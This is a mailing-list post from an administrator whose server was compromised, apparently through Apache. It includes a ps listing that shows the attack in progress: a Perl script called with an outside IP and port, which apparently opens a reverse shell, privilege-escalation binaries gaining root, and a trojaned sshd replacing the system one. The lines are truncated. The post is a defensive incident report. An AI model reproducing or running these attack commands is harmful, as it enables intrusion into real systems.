My machine was hacked - possibly via sshd?
This morning my machine was also compromised in a similar fashion as
described in your post here.
http://lists.debian.org/debian-security/2005/03/msg00112.html
Was the point of entry ever determined?
I just happened to log onto my machine while this was taking place. I did
a ps and killed everything except non essential processes and mounted a
directory tree I had with known good binaries and used those to poke
around the machine.
I have no idea how they got in, there were a lot of processes running as
nobody. I really only run apache as nobody, so that could be the point of
entry.
I will include the ps listing in the email. I would at least like to know
the name of the root kit if anyone has that info. I also saved all the
binaries and have a tripwire report of the changed files.
Thanks
# ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 Jan10 ? 00:00:24 init
root 2 1 0 Jan10 ? 00:00:00 [keventd]
root 3 0 0 Jan10 ? 00:00:01 [ksoftirqd_CPU0]
root 4 0 0 Jan10 ? 00:00:01 [ksoftirqd_CPU1]
root 5 0 0 Jan10 ? 00:52:23 [kswapd]
root 6 0 0 Jan10 ? 00:23:30 [kreclaimd]
root 7 0 0 Jan10 ? 00:06:15 [bdflush]
root 8 0 0 Jan10 ? 00:00:59 [kupdated]
root 9 1 0 Jan10 ? 00:00:00 [mdrecoveryd]
root 17 1 0 Jan10 ? 00:20:19 [kjournald]
root 92 1 0 Jan10 ? 00:00:00 [khubd]
root 185 1 0 Jan10 ? 00:00:00 [kjournald]
root 955 1 0 Jan10 ? 00:00:11 /usr/local/apache/bin/httpd
root 1294 1 0 Jan10 ? 00:00:00 [scsi_eh_2]
root 1335 1 0 Jan10 ? 00:00:04 crond
xfs 1407 1 0 Jan10 ? 00:00:00 xfs -droppriv -daemon
root 1471 1 0 Jan10 ? 00:00:00 /usr/local/snmp/sbin/snmpd
root 1504 1 0 Jan10 tty1 00:00:00 /sbin/mingetty tty1
root 1505 1 0 Jan10 tty2 00:00:00 /sbin/mingetty tty2
root 1506 1 0 Jan10 tty3 00:00:00 /sbin/mingetty tty3
root 1507 1 0 Jan10 tty4 00:00:00 /sbin/mingetty tty4
root 1508 1 0 Jan10 tty5 00:00:00 /sbin/mingetty tty5
root 1509 1 0 Jan10 tty6 00:00:00 /sbin/mingetty tty6
root 1896 1 0 Jan10 ? 00:23:49 /usr/local/sbin/named
root 18348 1 0 Jan10 ? 00:00:00 /usr/local/apache-https/bin/http
root 20871 1 0 Jan14 ? 00:00:00 /bin/sh /usr/local/mysql/bin/saf
mysql 20899 20871 0 Jan14 ? 00:08:03 /usr/local/mysql/libexec/mysqld
mysql 20901 20899 0 Jan14 ? 00:08:03 /usr/local/mysql/libexec/mysqld
mysql 20902 20901 0 Jan14 ? 00:09:27 /usr/local/mysql/libexec/mysqld
ntp 23268 1 0 May18 ? 00:00:01 ntpd -U ntp
root 5487 1 0 Jun20 ? 00:00:09 xinetd -stayalive -reuse -pidfil
root 25030 1 0 Jun25 ? 00:00:20 /usr/local/bin/perl /usr/local/p
nobody 6057 18348 0 Jul11 ? 00:00:07 /usr/local/apache-https/bin/http
nobody 6058 18348 0 Jul11 ? 00:00:10 /usr/local/apache-https/bin/http
nobody 6059 18348 0 Jul11 ? 00:00:09 /usr/local/apache-https/bin/http
nobody 6060 18348 0 Jul11 ? 00:00:09 /usr/local/apache-https/bin/http
nobody 6061 18348 0 Jul11 ? 00:00:07 /usr/local/apache-https/bin/http
nobody 6063 18348 0 Jul11 ? 00:00:09 /usr/local/apache-https/bin/http
nobody 6068 18348 0 Jul11 ? 00:00:08 /usr/local/apache-https/bin/http
bates 24856 1 0 Jul11 ? 00:00:01 ./server_linux -PID=tsserver2.pi
bates 24857 24856 0 Jul11 ? 00:00:00 ./server_linux -PID=tsserver2.pi
bates 24858 24857 0 Jul11 ? 00:00:01 ./server_linux -PID=tsserver2.pi
bates 24859 24857 0 Jul11 ? 00:00:01 ./server_linux -PID=tsserver2.pi
bates 24860 24857 0 Jul11 ? 00:00:00 ./server_linux -PID=tsserver2.pi
bates 24861 24857 0 Jul11 ? 00:00:00 ./server_linux -PID=tsserver2.pi
bates 24862 24857 0 Jul11 ? 00:00:00 ./server_linux -PID=tsserver2.pi
bates 24863 24857 0 Jul11 ? 00:00:00 ./server_linux -PID=tsserver2.pi
bates 24864 24857 0 Jul11 ? 00:00:00 ./server_linux -PID=tsserver2.pi
smmsp 23861 1 0 Jul15 ? 00:00:00 sendmail: Queue runner@00:05:00
root 23878 1 0 Jul15 ? 00:00:05 sendmail: accepting connections
root 16095 955 0 Jul18 ? 00:00:00 /usr/local/sbin/cronolog --perio
root 16096 955 0 Jul18 ? 00:00:00 /usr/local/sbin/cronolog --perio
root 16097 955 0 Jul18 ? 00:00:00 /usr/local/sbin/cronolog --perio
root 16098 955 0 Jul18 ? 00:00:09 /usr/local/sbin/cronolog --perio
root 16099 955 0 Jul18 ? 00:00:00 /usr/local/sbin/cronolog --perio
root 16100 955 0 Jul18 ? 00:00:00 /usr/local/sbin/cronolog --perio
nobody 16101 955 0 Jul18 ? 00:07:18 /usr/local/apache/bin/httpd
nobody 16102 955 0 Jul18 ? 00:07:01 /usr/local/apache/bin/httpd
nobody 16103 955 0 Jul18 ? 00:07:16 /usr/local/apache/bin/httpd
nobody 16104 955 0 Jul18 ? 00:07:12 /usr/local/apache/bin/httpd
nobody 16105 955 0 Jul18 ? 00:07:23 /usr/local/apache/bin/httpd
nobody 16107 955 0 Jul18 ? 00:06:58 /usr/local/apache/bin/httpd
nobody 16109 955 0 Jul18 ? 00:07:31 /usr/local/apache/bin/httpd
nobody 16110 955 0 Jul18 ? 00:07:42 /usr/local/apache/bin/httpd
nobody 16114 955 0 Jul18 ? 00:07:21 /usr/local/apache/bin/httpd
nobody 16116 955 0 Jul18 ? 00:07:05 /usr/local/apache/bin/httpd
root 371 1 0 03:31 ? 00:00:06 /usr/local/bin/spamd -d -c -a -m
root 3665 1 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3692 3665 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3693 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3694 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3695 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3696 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3697 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3698 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3699 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3700 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3701 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3702 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3703 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3704 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3705 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3706 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3707 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3708 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3709 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3710 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3711 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3712 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3713 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3714 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3715 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3716 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3717 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3718 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3719 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3720 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3721 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3722 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3723 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 3724 3692 0 06:01 ? 00:00:00 /usr/local/jdk1.3.1_02/bin/i386/
root 4471 23878 0 06:29 ? 00:00:00 sendmail: ./j6GIV8U9014887 mx00.
nobody 4742 1 0 06:39 ? 00:00:00 sh -c echo ;echo b_exp;cd /tmp;r
nobody 4745 4742 0 06:39 ? 00:00:00 perl clean 220.228.110.11 2025
nobody 4747 4745 0 06:39 ? 00:00:00 sh -c echo "`uname -a`";echo "`i
nobody 4752 4747 0 06:39 ? 00:00:00 /bin/sh
nobody 4824 4752 0 06:40 ? 00:00:00 ./ptr3
nobody 4825 4824 0 06:40 ? 00:00:00 [ptr3 <defunct>]
nobody 4826 4824 0 06:40 ? 00:00:00 [ptr3 <defunct>]
root 4827 4824 0 06:40 ? 00:00:00 [modprobe <defunct>]
root 4829 4824 0 06:40 ? 00:00:00 /bin/sh
root 4831 1 0 06:40 ? 00:00:00 ./ptr3
root 4858 4829 0 06:41 ? 00:00:00 /bin/sh ./make
root 4863 4858 0 06:41 ? 00:00:00 ./inst
root 4866 1 0 06:41 ? 00:00:00 chmod 777 conf configure inst li
root 4867 4863 0 06:41 ? 00:00:00 /bin/bash ./configure
root 4870 4866 0 06:41 ? 00:00:00 [chmod <defunct>]
root 4920 1 0 06:41 ? 00:00:00 chmod 755 /usr/local/bin/ssh2
root 4925 4920 0 06:41 ? 00:00:00 [chmod <defunct>]
root 4927 1 0 06:41 ? 00:00:00 mv -f sshd /usr/sbin/sshd
root 4929 1 0 06:41 ? 00:00:00 chown root.bin /usr/sbin/sshd
root 4932 4929 0 06:41 ? 00:00:00 [chown <defunct>]
root 4933 4927 0 06:41 ? 00:00:00 [mv <defunct>]
root 4940 1 0 06:41 ? 00:00:00 chown root.bin /usr/local/sbin/s
root 4950 4940 0 06:41 ? 00:00:00 [chown <defunct>]
root 4958 1 0 06:41 ? 00:00:00 hostname -f
root 4960 4958 0 06:41 ? 00:00:00 [hostname <defunct>]
nobody 4964 1 0 06:42 ? 00:00:00 sh -c echo ;echo b_exp;cd /tmp;r
nobody 4967 4964 0 06:42 ? 00:00:00 perl clean 220.228.110.11 2025
nobody 4968 4967 0 06:42 ? 00:00:00 sh -c echo "`uname -a`";echo "`i
nobody 4973 4968 0 06:42 ? 00:00:00 /bin/sh
nobody 4985 4973 0 06:42 ? 00:00:01
nobody 4996 1 0 06:42 ? 00:00:00 sh -c echo ;echo b_exp;cd /tmp;r
nobody 4999 4996 0 06:42 ? 00:00:00 perl clean 220.228.110.11 2025
nobody 5000 4999 0 06:43 ? 00:00:00 sh -c echo "`uname -a`";echo "`i
nobody 5005 5000 0 06:43 ? 00:00:00 /bin/sh
nobody 5030 5005 0 06:43 ? 00:00:00 ./traci
nobody 5031 5030 0 06:43 ? 00:00:00 ./traci
nobody 5032 5030 0 06:43 ? 00:00:00 [traci <defunct>]
root 5033 5030 0 06:43 ? 00:00:00 [modprobe <defunct>]
root 5034 5030 0 06:43 ? 00:00:00 /bin/sh
root 5035 5034 0 06:43 ? 00:00:00 ./traci
root 5055 23878 0 06:43 ? 00:00:00 sendmail: j6KDhuqh005055 e176012
root 5105 1 0 06:44 ? 00:00:00 minilogd
root 5233 1 0 06:46 ? 00:00:00 sendmail: accepting connections
root 5260 1 0 06:46 ? 00:00:00 sshd: bates [priv]
bates 5264 5260 0 06:46 ? 00:00:00 sshd: bates@pts/2
bates 5266 5264 0 06:46 pts/2 00:00:00 -bash
root 5423 5266 0 06:47 pts/2 00:00:00 bash
root 5562 1 0 06:49 ? 00:00:00 /usr/local/sbin/sshd
root 6465 5423 46 06:51 pts/2 00:01:55 tripwire
root 6965 5562 0 06:52 ? 00:00:00 sshd: bates [priv]
bates 6968 6965 0 06:52 ? 00:00:00 sshd: bates@pts/3
bates 6969 6968 0 06:52 pts/3 00:00:00 -bash
root 7061 6969 0 06:53 pts/3 00:00:00 bash
mysql 7343 20901 0 06:55 ? 00:00:00 /usr/local/mysql/libexec/mysqld
root 7344 7061 0 06:55 pts/3 00:00:00 ps -ef
Reply to: